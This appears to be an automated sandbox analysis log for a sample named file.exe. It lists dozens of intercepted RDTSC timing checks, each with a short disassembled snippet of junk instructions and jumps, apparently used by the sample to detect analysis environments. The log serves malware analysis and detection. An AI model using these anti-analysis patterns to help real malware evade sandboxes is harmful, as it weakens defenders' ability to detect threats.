                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54ABA second address: F54AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dx, B546h 0x0000000e push 00000004h 0x00000010 sub dword ptr [ebp+124413DFh], edx 0x00000016 push eax 0x00000017 pushad 0x00000018 jmp 00007FC2C8DD5F06h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54AEC second address: F54AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA49CD second address: FA49D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA49D7 second address: FA49E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edx 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA55B2 second address: FA55F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 jbe 00007FC2C8DD5EF6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jnl 00007FC2C8DD5EF6h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jp 00007FC2C8DD5EFEh 0x00000022 push ecx 0x00000023 jmp 00007FC2C8DD5F06h 0x00000028 pop ecx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8AFC second address: FA8B35 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC2C8B990BFh 0x00000008 jmp 00007FC2C8B990A9h 0x0000000d jmp 00007FC2C8B990A0h 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007FC2C8B99096h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA83B0 second address: FA83B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA83B6 second address: FA83EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC2C8B9909Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FC2C8B990A5h 0x00000011 jmp 00007FC2C8B9909Fh 0x00000016 pushad 0x00000017 jl 00007FC2C8B99096h 0x0000001d jno 00007FC2C8B99096h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8857 second address: FA885C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA885C second address: FA8862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8862 second address: FA8868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFA3A second address: FAFA4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC2C8B9909Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFA4F second address: FAFA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFA53 second address: FAFA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFA5D second address: FAFA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAEE3A second address: FAEE58 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC2C8B99096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FC2C8B99098h 0x00000019 push edx 0x0000001a pop edx 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAEE58 second address: FAEE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8DD5F01h 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAEE6E second address: FAEE99 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC2C8B9909Eh 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007FC2C8B99096h 0x00000010 push eax 0x00000011 jmp 00007FC2C8B990A8h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF2FA second address: FAF306 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF306 second address: FAF30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF30E second address: FAF313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF490 second address: FAF49B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF49B second address: FAF4A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF5F4 second address: FAF612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FC2C8B990A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB56F6 second address: FB56FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB56FA second address: FB56FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB56FE second address: FB570D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC2C8DD5EF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB570D second address: FB5734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007FC2C8B99096h 0x0000000e popad 0x0000000f pushad 0x00000010 ja 00007FC2C8B99096h 0x00000016 pushad 0x00000017 popad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d popad 0x0000001e ja 00007FC2C8B990B1h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5C1D second address: FB5C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5C22 second address: FB5C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC2C8B99096h 0x00000009 jmp 00007FC2C8B9909Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5C3D second address: FB5C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC2C8DD5EFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5C54 second address: FB5C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6482 second address: FB6486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6486 second address: FB648A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB648A second address: FB64AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC2C8DD5EF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC2C8DD5F02h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB64AC second address: FB64B6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC2C8B99096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB64B6 second address: FB64BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6776 second address: FB677C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB677C second address: FB6782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6ACE second address: FB6AF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC2C8B990A7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FC2C8B99096h 0x00000013 jnp 00007FC2C8B99096h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6AF9 second address: FB6AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB69C second address: FBB6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007FC2C8B99096h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB6A8 second address: FBB6BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F02h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB939 second address: FBB943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC2C8B99096h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB943 second address: FBB96D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5EFFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FC2C8DD5EF6h 0x00000015 jmp 00007FC2C8DD5EFBh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB96D second address: FBB98D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB98D second address: FBB995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBBC24 second address: FBBC28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBBC28 second address: FBBC32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC2C8DD5EF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC0A2 second address: FBC0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC0A8 second address: FBC0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC0AD second address: FBC0D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC2C8B9909Fh 0x00000008 jnp 00007FC2C8B99096h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FC2C8B99096h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC210 second address: FBC22B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC22B second address: FBC238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC238 second address: FBC23E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC11F5 second address: FC11FE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC11FE second address: FC121D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FC2C8DD5F06h 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA0A2 second address: FCA0BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA0BE second address: FCA0D0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2C8DD5EFAh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCA0D0 second address: FCA0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC2C8B99096h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCA0DC second address: FCA0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FC2C8DD5EF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCA0EB second address: FCA0FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FC2C8B99096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FC2C8B99096h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCA0FF second address: FCA103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC8A89 second address: FC8A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC97D4 second address: FC97DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC2C8DD5EF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC97DF second address: FC97E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC97E4 second address: FC9802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8DD5F08h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCF75A second address: FCF769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 ja 00007FC2C8B99096h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD3599 second address: FD359D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD3741 second address: FD3755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FDF1D5 second address: FDF1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FDEEB4 second address: FDEECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B9909Dh 0x00000009 popad 0x0000000a js 00007FC2C8B9909Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FE5F1C second address: FE5F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FE5F20 second address: FE5F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FE5934 second address: FE5950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F08h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FE5950 second address: FE595E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FE595E second address: FE5968 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FE5AE6 second address: FE5AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FE5AEA second address: FE5B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8DD5EFDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FE5B03 second address: FE5B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FE5B07 second address: FE5B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FEABBC second address: FEABC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FEABC0 second address: FEABC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F0EA36 second address: F0EA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F0EA3C second address: F0EA60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F04h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FC2C8DD5EF6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F0EA60 second address: F0EA66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F0EA66 second address: F0EA6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FEC528 second address: FEC53F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC2C8B990A2h 0x00000008 jnc 00007FC2C8B99096h 0x0000000e jg 00007FC2C8B99096h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FEC53F second address: FEC545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FEC383 second address: FEC389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FEC389 second address: FEC38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FF10EC second address: FF1105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC2C8B99096h 0x0000000a jmp 00007FC2C8B9909Eh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FF1105 second address: FF1115 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FC2C8DD5EF6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFE371 second address: FFE37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFE37A second address: FFE3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8DD5F08h 0x00000009 jmp 00007FC2C8DD5F04h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jnp 00007FC2C8DD5EF6h 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFE3B8 second address: FFE3BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFE3BE second address: FFE3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFE516 second address: FFE51A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
